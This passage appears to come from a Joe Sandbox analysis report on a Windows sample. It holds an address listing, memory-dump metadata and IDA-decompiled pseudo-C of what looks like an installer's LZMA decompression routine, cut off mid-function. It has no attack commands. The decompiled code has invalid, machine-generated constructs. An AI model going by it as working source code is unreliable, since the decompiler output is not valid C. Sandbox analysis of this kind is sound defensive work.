                                                            0x00406370
                                                            0x00406370
                                                            0x00406370
                                                            0x00406373
                                                            0x00406376
                                                            0x00406376
                                                            0x00406379
                                                            0x0040637c
                                                            0x00000000
                                                            0x00000000
                                                            0x00406382
                                                            0x00406388
                                                            0x00000000
                                                            0x00000000
                                                            0x0040638e
                                                            0x0040638e
                                                            0x00406392
                                                            0x00406395
                                                            0x00406398
                                                            0x0040639b
                                                            0x0040639e
                                                            0x0040639f
                                                            0x004063a2
                                                            0x004063a4
                                                            0x004063aa
                                                            0x004063ad
                                                            0x004063b0
                                                            0x004063b3
                                                            0x004063b6
                                                            0x004063b9
                                                            0x004063bc
                                                            0x004063d8
                                                            0x004063db
                                                            0x004063de
                                                            0x004063e1
                                                            0x004063e8
                                                            0x004063ec
                                                            0x004063ee
                                                            0x004063f2
                                                            0x004063be
                                                            0x004063be
                                                            0x004063c2
                                                            0x004063ca
                                                            0x004063cf
                                                            0x004063d1
                                                            0x004063d3
                                                            0x004063d3
                                                            0x004063f5
                                                            0x004063fc
                                                            0x004063ff
                                                            0x00000000
                                                            0x00406405
                                                            0x00000000
                                                            0x00406405
                                                            0x00000000
                                                            0x0040640a
                                                            0x0040640a
                                                            0x0040640e
                                                            0x00406ace
                                                            0x00000000
                                                            0x00406ace
                                                            0x00406414
                                                            0x00406417
                                                            0x0040641a
                                                            0x0040641e
                                                            0x00406421
                                                            0x00406427
                                                            0x00406429
                                                            0x00406429
                                                            0x00406429
                                                            0x0040642c
                                                            0x0040642f
                                                            0x0040642f
                                                            0x0040642f
                                                            0x00406435
                                                            0x00000000
                                                            0x00000000
                                                            0x00406437
                                                            0x0040643a
                                                            0x0040643d
                                                            0x00406440
                                                            0x00406443
                                                            0x00406446
                                                            0x00406449
                                                            0x0040644c
                                                            0x0040644f
                                                            0x00406452
                                                            0x00406455
                                                            0x0040646d
                                                            0x00406470
                                                            0x00406473
                                                            0x00406476
                                                            0x00406476
                                                            0x00406479
                                                            0x0040647d
                                                            0x0040647f
                                                            0x00406457
                                                            0x00406457
                                                            0x0040645f
                                                            0x00406464
                                                            0x00406466
                                                            0x00406468
                                                            0x00406468
                                                            0x00406482
                                                            0x00406489
                                                            0x0040648c
                                                            0x00000000
                                                            0x0040648e
                                                            0x00000000
                                                            0x0040648e
                                                            0x0040648c
                                                            0x00406493
                                                            0x00406493
                                                            0x00406493
                                                            0x00406493
                                                            0x00000000
                                                            0x00000000
                                                            0x004064ce
                                                            0x004064ce
                                                            0x004064d2
                                                            0x00406ada
                                                            0x00000000
                                                            0x00406ada
                                                            0x004064d8
                                                            0x004064db
                                                            0x004064de
                                                            0x004064e2
                                                            0x004064e5
                                                            0x004064eb
                                                            0x004064ed
                                                            0x004064ed
                                                            0x004064ed
                                                            0x004064f0
                                                            0x004064f3
                                                            0x004064f3
                                                            0x004064f9
                                                            0x00406497
                                                            0x00406497
                                                            0x0040649a
                                                            0x00000000
                                                            0x0040649a
                                                            0x004064fb
                                                            0x004064fb
                                                            0x004064fe
                                                            0x00406501
                                                            0x00406504
                                                            0x00406507
                                                            0x0040650a
                                                            0x0040650d
                                                            0x00406510
                                                            0x00406513
                                                            0x00406516
                                                            0x00406519
                                                            0x00406531
                                                            0x00406534
                                                            0x00406537
                                                            0x0040653a
                                                            0x0040653a
                                                            0x0040653d
                                                            0x00406541
                                                            0x00406543
                                                            0x0040651b
                                                            0x0040651b
                                                            0x00406523
                                                            0x00406528
                                                            0x0040652a
                                                            0x0040652c
                                                            0x0040652c
                                                            0x00406546
                                                            0x0040654d
                                                            0x00406550
                                                            0x00000000
                                                            0x00406552
                                                            0x00000000
                                                            0x00406552
                                                            0x00000000
                                                            0x004067df
                                                            0x004067df
                                                            0x004067e3
                                                            0x00406b0a
                                                            0x00000000
                                                            0x00406b0a
                                                            0x004067e9
                                                            0x004067ec
                                                            0x004067ef
                                                            0x004067f3
                                                            0x004067f6
                                                            0x004067fc
                                                            0x004067fe
                                                            0x004067fe
                                                            0x004067fe
                                                            0x00406801
                                                            0x00000000
                                                            0x00000000
                                                            0x004065af
                                                            0x004065af
                                                            0x004065b2
                                                            0x00406924
                                                            0x00406924
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004069ab
                                                            0x004069af
                                                            0x004069cd
                                                            0x004069cd
                                                            0x004069cd
                                                            0x004069d4
                                                            0x004069db
                                                            0x00000000
                                                            0x004069db
                                                            0x004069b1
                                                            0x004069b4
                                                            0x004069b7
                                                            0x004069ba
                                                            0x004069c1
                                                            0x00000000
                                                            0x00000000
                                                            0x00406a9c
                                                            0x00406a9f
                                                            0x004069a0
                                                            0x004069a0
                                                            0x00000000
                                                            0x00000000
                                                            0x004066d6
                                                            0x004066d8
                                                            0x004066df
                                                            0x004066e0
                                                            0x004066e2
                                                            0x004066e5
                                                            0x00000000
                                                            0x00000000
                                                            0x004066ed
                                                            0x004066f0
                                                            0x004066f3
                                                            0x004066f5
                                                            0x004066f7
                                                            0x004066f7
                                                            0x004066f8
                                                            0x004066fb
                                                            0x00406702
                                                            0x00406705
                                                            0x00406713
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004069f8
                                                            0x004069f8
                                                            0x004069fc
                                                            0x00406b34
                                                            0x00000000
                                                            0x00406b34
                                                            0x00406a02
                                                            0x00406a05
                                                            0x00406a08
                                                            0x00406a0c
                                                            0x00406a0f
                                                            0x00406a15
                                                            0x00406a17
                                                            0x00406a17
                                                            0x00406a17
                                                            0x00406a1a
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00000000
                                                            0x00000000
                                                            0x0040671b
                                                            0x0040671e
                                                            0x00406754
                                                            0x00406884
                                                            0x00406884
                                                            0x00406884
                                                            0x00406884
                                                            0x00406887
                                                            0x00406887
                                                            0x0040688a
                                                            0x0040688c
                                                            0x00406b16
                                                            0x00000000
                                                            0x00406b16
                                                            0x00406892
                                                            0x00406895
                                                            0x00000000
                                                            0x00000000
                                                            0x0040689b
                                                            0x0040689f
                                                            0x004068a2
                                                            0x004068a2
                                                            0x004068a2
                                                            0x00000000
                                                            0x004068a2
                                                            0x00406720
                                                            0x00406722
                                                            0x00406724
                                                            0x00406726
                                                            0x00406729
                                                            0x0040672a
                                                            0x0040672c
                                                            0x0040672e
                                                            0x00406731
                                                            0x00406734
                                                            0x0040674a
                                                            0x0040674f
                                                            0x00406787
                                                            0x00406787
                                                            0x0040678b
                                                            0x004067b7
                                                            0x004067b9
                                                            0x004067c0
                                                            0x004067c3
                                                            0x004067c6
                                                            0x004067c6
                                                            0x004067cb
                                                            0x004067cb
                                                            0x004067cd
                                                            0x004067d0
                                                            0x004067d7
                                                            0x004067da
                                                            0x00406807
                                                            0x00406807
                                                            0x0040680a
                                                            0x0040680d
                                                            0x00406881
                                                            0x00406881
                                                            0x00406881
                                                            0x00000000
                                                            0x00406881
                                                            0x0040680f
                                                            0x00406815
                                                            0x00406818
                                                            0x0040681b
                                                            0x0040681e
                                                            0x00406821
                                                            0x00406824
                                                            0x00406827
                                                            0x0040682a
                                                            0x0040682d
                                                            0x00406830
                                                            0x00406849
                                                            0x0040684b
                                                            0x0040684e
                                                            0x0040684f
                                                            0x00406852
                                                            0x00406854
                                                            0x00406857
                                                            0x00406859
                                                            0x0040685b
                                                            0x0040685e
                                                            0x00406860
                                                            0x00406863
                                                            0x00406867
                                                            0x00406869
                                                            0x00406869
                                                            0x0040686a
                                                            0x0040686d
                                                            0x00406870
                                                            0x00406832
                                                            0x00406832
                                                            0x0040683a
                                                            0x0040683f
                                                            0x00406841
                                                            0x00406844
                                                            0x00406844
                                                            0x00406873
                                                            0x0040687a
                                                            0x00406804
                                                            0x00406804
                                                            0x00406804
                                                            0x00406804
                                                            0x00000000
                                                            0x0040687c
                                                            0x00000000
                                                            0x0040687c
                                                            0x0040687a
                                                            0x0040678d
                                                            0x00406790
                                                            0x00406792
                                                            0x00406795
                                                            0x00406798
                                                            0x0040679b
                                                            0x0040679d
                                                            0x004067a0
                                                            0x004067a3
                                                            0x004067a3
                                                            0x004067a6
                                                            0x004067a6
                                                            0x004067a9
                                                            0x004067b0
                                                            0x00406784
                                                            0x00406784
                                                            0x00406784
                                                            0x00406784
                                                            0x00000000
                                                            0x004067b2
                                                            0x00000000
                                                            0x004067b2
                                                            0x004067b0
                                                            0x00406736
                                                            0x00406739
                                                            0x0040673b
                                                            0x0040673e
                                                            0x00000000
                                                            0x00000000
                                                            0x0040649d
                                                            0x0040649d
                                                            0x004064a1
                                                            0x00406ae6
                                                            0x00000000
                                                            0x00406ae6
                                                            0x004064a7
                                                            0x004064aa
                                                            0x004064ad
                                                            0x004064b0
                                                            0x004064b3
                                                            0x004064b6
                                                            0x004064b9
                                                            0x004064bb
                                                            0x004064be
                                                            0x004064c1
                                                            0x004064c4
                                                            0x004064c6
                                                            0x004064c6
                                                            0x004064c6
                                                            0x00000000
                                                            0x00000000
                                                            0x00406628
                                                            0x00406628
                                                            0x0040662c
                                                            0x00406af2
                                                            0x00000000
                                                            0x00406af2
                                                            0x00406632
                                                            0x00406635
                                                            0x00406638
                                                            0x0040663b
                                                            0x0040663d
                                                            0x0040663d
                                                            0x0040663d
                                                            0x00406640
                                                            0x00406643
                                                            0x00406646
                                                            0x00406649
                                                            0x0040664c
                                                            0x0040664f
                                                            0x00406650
                                                            0x00406652
                                                            0x00406652
                                                            0x00406652
                                                            0x00406655
                                                            0x00406658
                                                            0x0040665b
                                                            0x0040665e
                                                            0x0040665e
                                                            0x0040665e
                                                            0x00406661
                                                            0x00406663
                                                            0x00406663
                                                            0x00000000
                                                            0x00000000
                                                            0x004068a5
                                                            0x004068a5
                                                            0x004068a5
                                                            0x004068a9
                                                            0x00000000
                                                            0x00000000
                                                            0x004068af
                                                            0x004068b2
                                                            0x004068b5
                                                            0x004068b8
                                                            0x004068ba
                                                            0x004068ba
                                                            0x004068ba
                                                            0x004068bd
                                                            0x004068c0
                                                            0x004068c3
                                                            0x004068c6
                                                            0x004068c9
                                                            0x004068cc
                                                            0x004068cd
                                                            0x004068cf
                                                            0x004068cf
                                                            0x004068cf
                                                            0x004068d2
                                                            0x004068d5
                                                            0x004068d8
                                                            0x004068db
                                                            0x004068de
                                                            0x004068e2
                                                            0x004068e4
                                                            0x004068e7
                                                            0x00000000
                                                            0x004068e9
                                                            0x00406666
                                                            0x00406666
                                                            0x00000000
                                                            0x00406666
                                                            0x004068e7
                                                            0x00406b1c
                                                            0x00406b3e
                                                            0x00406b44
                                                            0x00406b46
                                                            0x00406b4d
                                                            0x00406b4f
                                                            0x00406b56
                                                            0x00406b5a
                                                            0x00000000
                                                            0x0040614b
                                                            0x00406b53
                                                            0x00406b53
                                                            0x00000000
                                                            0x00406b53
                                                            0x004069a0
                                                            0x00406a26
                                                            0x00406a2c
                                                            0x00406a2f
                                                            0x00406a32
                                                            0x00406a35
                                                            0x00406a38
                                                            0x00406a3b
                                                            0x00406a3e
                                                            0x00406a41
                                                            0x00406a47
                                                            0x00406a60
                                                            0x00406a63
                                                            0x00406a66
                                                            0x00406a69
                                                            0x00406a6d
                                                            0x00406a6f
                                                            0x00406a70
                                                            0x00406a73
                                                            0x00406a49
                                                            0x00406a49
                                                            0x00406a51
                                                            0x00406a56
                                                            0x00406a58
                                                            0x00406a5b
                                                            0x00406a5b
                                                            0x00406a7d
                                                            0x00000000
                                                            0x00406a7f
                                                            0x00000000
                                                            0x00406a7f
                                                            0x00406a7d
                                                            0x00000000
                                                            0x004068f2

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 57f52ef8ebfd3b6830ca252784d29864a174ee9a5c8600b40a037bd56b74384a
                                                            • Instruction ID: 0388e715484a44d40d4ddbde005df80b94e1e5136e8ff3af7516764e2fd1b4f7
                                                            • Opcode Fuzzy Hash: 57f52ef8ebfd3b6830ca252784d29864a174ee9a5c8600b40a037bd56b74384a
                                                            • Instruction Fuzzy Hash: 0F913170E00229CBDF28CF98C8447ADBBB1FF44305F15816AD816BB281D778AA96DF44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 98%
                                                            			E00406604() {
                                                            				unsigned short _t532;
                                                            				signed int _t533;
                                                            				void _t534;
                                                            				void* _t535;
                                                            				signed int _t536;
                                                            				signed int _t565;
                                                            				signed int _t568;
                                                            				signed int _t589;
                                                            				signed int* _t606;
                                                            				void* _t613;
                                                            
                                                            				L0:
                                                            				while(1) {
                                                            					L0:
                                                            					if( *(_t613 - 0x40) != 0) {
                                                            						L89:
                                                            						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                            						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                            						L69:
                                                            						_t606 =  *(_t613 - 0x58);
                                                            						 *(_t613 - 0x84) = 0x12;
                                                            						L132:
                                                            						 *(_t613 - 0x54) = _t606;
                                                            						L133:
                                                            						_t532 =  *_t606;
                                                            						_t589 = _t532 & 0x0000ffff;
                                                            						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                            						if( *(_t613 - 0xc) >= _t565) {
                                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                            							 *(_t613 - 0x40) = 1;
                                                            							_t533 = _t532 - (_t532 >> 5);
                                                            							 *_t606 = _t533;
                                                            						} else {
                                                            							 *(_t613 - 0x10) = _t565;
                                                            							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                            							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                            						}
                                                            						if( *(_t613 - 0x10) >= 0x1000000) {
                                                            							L139:
                                                            							_t534 =  *(_t613 - 0x84);
                                                            							L140:
                                                            							 *(_t613 - 0x88) = _t534;
                                                            							goto L1;
                                                            						} else {
                                                            							L137:
                                                            							if( *(_t613 - 0x6c) == 0) {
                                                            								 *(_t613 - 0x88) = 5;
                                                            								goto L170;
                                                            							}
                                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                            							goto L139;
                                                            						}
                                                            					} else {
                                                            						if( *(__ebp - 0x60) == 0) {
                                                            							L171:
                                                            							_t536 = _t535 | 0xffffffff;
                                                            							L172:
                                                            							return _t536;
                                                            						}
                                                            						__eax = 0;
                                                            						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                            						0 | _t258 = _t258 + _t258 + 9;
                                                            						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                            						L75:
                                                            						if( *(__ebp - 0x64) == 0) {
                                                            							 *(__ebp - 0x88) = 0x1b;
                                                            							L170:
                                                            							_t568 = 0x22;
                                                            							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                            							_t536 = 0;
                                                            							goto L172;
                                                            						}
                                                            						__eax =  *(__ebp - 0x14);
                                                            						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            						if(__eax >=  *(__ebp - 0x74)) {
                                                            							__eax = __eax +  *(__ebp - 0x74);
                                                            						}
                                                            						__edx =  *(__ebp - 8);
                                                            						__cl =  *(__eax + __edx);
                                                            						__eax =  *(__ebp - 0x14);
                                                            						 *(__ebp - 0x5c) = __cl;
                                                            						 *(__eax + __edx) = __cl;
                                                            						__eax = __eax + 1;
                                                            						__edx = 0;
                                                            						_t274 = __eax %  *(__ebp - 0x74);
                                                            						__eax = __eax /  *(__ebp - 0x74);
                                                            						__edx = _t274;
                                                            						__eax =  *(__ebp - 0x68);
                                                            						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            						_t283 = __ebp - 0x64;
                                                            						 *_t283 =  *(__ebp - 0x64) - 1;
                                                            						 *( *(__ebp - 0x68)) = __cl;
                                                            						L79:
                                                            						 *(__ebp - 0x14) = __edx;
                                                            						L80:
                                                            						 *(__ebp - 0x88) = 2;
                                                            					}
                                                            					L1:
                                                            					_t535 =  *(_t613 - 0x88);
                                                            					if(_t535 > 0x1c) {
                                                            						goto L171;
                                                            					}
                                                            					switch( *((intOrPtr*)(_t535 * 4 +  &M00406B5B))) {
                                                            						case 0:
                                                            							if( *(_t613 - 0x6c) == 0) {
                                                            								goto L170;
                                                            							}
                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                            							_t535 =  *( *(_t613 - 0x70));
                                                            							if(_t535 > 0xe1) {
                                                            								goto L171;
                                                            							}
                                                            							_t539 = _t535 & 0x000000ff;
                                                            							_push(0x2d);
                                                            							asm("cdq");
                                                            							_pop(_t570);
                                                            							_push(9);
                                                            							_pop(_t571);
                                                            							_t609 = _t539 / _t570;
                                                            							_t541 = _t539 % _t570 & 0x000000ff;
                                                            							asm("cdq");
                                                            							_t604 = _t541 % _t571 & 0x000000ff;
                                                            							 *(_t613 - 0x3c) = _t604;
                                                            							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                            							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                            							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                            							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                            								L10:
                                                            								if(_t612 == 0) {
                                                            									L12:
                                                            									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                            									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                            									goto L15;
                                                            								} else {
                                                            									goto L11;
                                                            								}
                                                            								do {
                                                            									L11:
                                                            									_t612 = _t612 - 1;
                                                            									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                            								} while (_t612 != 0);
                                                            								goto L12;
                                                            							}
                                                            							if( *(_t613 - 4) != 0) {
                                                            								GlobalFree( *(_t613 - 4));
                                                            							}
                                                            							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                            							 *(_t613 - 4) = _t535;
                                                            							if(_t535 == 0) {
                                                            								goto L171;
                                                            							} else {
                                                            								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                            								goto L10;
                                                            							}
                                                            						case 1:
                                                            							L13:
                                                            							__eflags =  *(_t613 - 0x6c);
                                                            							if( *(_t613 - 0x6c) == 0) {
                                                            								 *(_t613 - 0x88) = 1;
                                                            								goto L170;
                                                            							}
                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                            							_t45 = _t613 - 0x48;
                                                            							 *_t45 =  *(_t613 - 0x48) + 1;
                                                            							__eflags =  *_t45;
                                                            							L15:
                                                            							if( *(_t613 - 0x48) < 4) {
                                                            								goto L13;
                                                            							}
                                                            							_t547 =  *(_t613 - 0x40);
                                                            							if(_t547 ==  *(_t613 - 0x74)) {
                                                            								L20:
                                                            								 *(_t613 - 0x48) = 5;
                                                            								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                            								goto L23;
                                                            							}
                                                            							 *(_t613 - 0x74) = _t547;
                                                            							if( *(_t613 - 8) != 0) {
                                                            								GlobalFree( *(_t613 - 8));
                                                            							}
                                                            							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                            							 *(_t613 - 8) = _t535;
                                                            							if(_t535 == 0) {
                                                            								goto L171;
                                                            							} else {
                                                            								goto L20;
                                                            							}
                                                            						case 2:
                                                            							L24:
                                                            							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                            							 *(_t613 - 0x84) = 6;
                                                            							 *(_t613 - 0x4c) = _t554;
                                                            							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                            							goto L132;
                                                            						case 3:
                                                            							L21:
                                                            							__eflags =  *(_t613 - 0x6c);
                                                            							if( *(_t613 - 0x6c) == 0) {
                                                            								 *(_t613 - 0x88) = 3;
                                                            								goto L170;
                                                            							}
                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            							_t67 = _t613 - 0x70;
                                                            							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                            							__eflags =  *_t67;
                                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                            							L23:
                                                            							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                            							if( *(_t613 - 0x48) != 0) {
                                                            								goto L21;
                                                            							}
                                                            							goto L24;
                                                            						case 4:
                                                            							goto L133;
                                                            						case 5:
                                                            							goto L137;
                                                            						case 6:
                                                            							__edx = 0;
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								__eax =  *(__ebp - 4);
                                                            								__ecx =  *(__ebp - 0x38);
                                                            								 *(__ebp - 0x34) = 1;
                                                            								 *(__ebp - 0x84) = 7;
                                                            								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                            								goto L132;
                                                            							}
                                                            							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                            							__esi =  *(__ebp - 0x60);
                                                            							__cl = 8;
                                                            							__cl = 8 -  *(__ebp - 0x3c);
                                                            							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                            							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                            							__ecx =  *(__ebp - 0x3c);
                                                            							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                            							__ecx =  *(__ebp - 4);
                                                            							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                            							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                            							__eflags =  *(__ebp - 0x38) - 4;
                                                            							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            							if( *(__ebp - 0x38) >= 4) {
                                                            								__eflags =  *(__ebp - 0x38) - 0xa;
                                                            								if( *(__ebp - 0x38) >= 0xa) {
                                                            									_t98 = __ebp - 0x38;
                                                            									 *_t98 =  *(__ebp - 0x38) - 6;
                                                            									__eflags =  *_t98;
                                                            								} else {
                                                            									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                            								}
                                                            							} else {
                                                            								 *(__ebp - 0x38) = 0;
                                                            							}
                                                            							__eflags =  *(__ebp - 0x34) - __edx;
                                                            							if( *(__ebp - 0x34) == __edx) {
                                                            								__ebx = 0;
                                                            								__ebx = 1;
                                                            								goto L61;
                                                            							} else {
                                                            								__eax =  *(__ebp - 0x14);
                                                            								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            								__eflags = __eax -  *(__ebp - 0x74);
                                                            								if(__eax >=  *(__ebp - 0x74)) {
                                                            									__eax = __eax +  *(__ebp - 0x74);
                                                            									__eflags = __eax;
                                                            								}
                                                            								__ecx =  *(__ebp - 8);
                                                            								__ebx = 0;
                                                            								__ebx = 1;
                                                            								__al =  *((intOrPtr*)(__eax + __ecx));
                                                            								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                            								goto L41;
                                                            							}
                                                            						case 7:
                                                            							__eflags =  *(__ebp - 0x40) - 1;
                                                            							if( *(__ebp - 0x40) != 1) {
                                                            								__eax =  *(__ebp - 0x24);
                                                            								 *(__ebp - 0x80) = 0x16;
                                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            								__eax =  *(__ebp - 0x28);
                                                            								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            								__eax =  *(__ebp - 0x2c);
                                                            								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            								__eax = 0;
                                                            								__eflags =  *(__ebp - 0x38) - 7;
                                                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            								__al = __al & 0x000000fd;
                                                            								__eax = (__eflags >= 0) - 1 + 0xa;
                                                            								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                            								__eax =  *(__ebp - 4);
                                                            								__eax =  *(__ebp - 4) + 0x664;
                                                            								__eflags = __eax;
                                                            								 *(__ebp - 0x58) = __eax;
                                                            								goto L69;
                                                            							}
                                                            							__eax =  *(__ebp - 4);
                                                            							__ecx =  *(__ebp - 0x38);
                                                            							 *(__ebp - 0x84) = 8;
                                                            							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                            							goto L132;
                                                            						case 8:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								__eax =  *(__ebp - 4);
                                                            								__ecx =  *(__ebp - 0x38);
                                                            								 *(__ebp - 0x84) = 0xa;
                                                            								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                            							} else {
                                                            								__eax =  *(__ebp - 0x38);
                                                            								__ecx =  *(__ebp - 4);
                                                            								__eax =  *(__ebp - 0x38) + 0xf;
                                                            								 *(__ebp - 0x84) = 9;
                                                            								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                            								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                            							}
                                                            							goto L132;
                                                            						case 9:
                                                            							goto L0;
                                                            						case 0xa:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								__eax =  *(__ebp - 4);
                                                            								__ecx =  *(__ebp - 0x38);
                                                            								 *(__ebp - 0x84) = 0xb;
                                                            								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                            								goto L132;
                                                            							}
                                                            							__eax =  *(__ebp - 0x28);
                                                            							goto L88;
                                                            						case 0xb:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								__ecx =  *(__ebp - 0x24);
                                                            								__eax =  *(__ebp - 0x20);
                                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            							} else {
                                                            								__eax =  *(__ebp - 0x24);
                                                            							}
                                                            							__ecx =  *(__ebp - 0x28);
                                                            							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            							L88:
                                                            							__ecx =  *(__ebp - 0x2c);
                                                            							 *(__ebp - 0x2c) = __eax;
                                                            							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            							goto L89;
                                                            						case 0xc:
                                                            							L99:
                                                            							__eflags =  *(__ebp - 0x6c);
                                                            							if( *(__ebp - 0x6c) == 0) {
                                                            								 *(__ebp - 0x88) = 0xc;
                                                            								goto L170;
                                                            							}
                                                            							__ecx =  *(__ebp - 0x70);
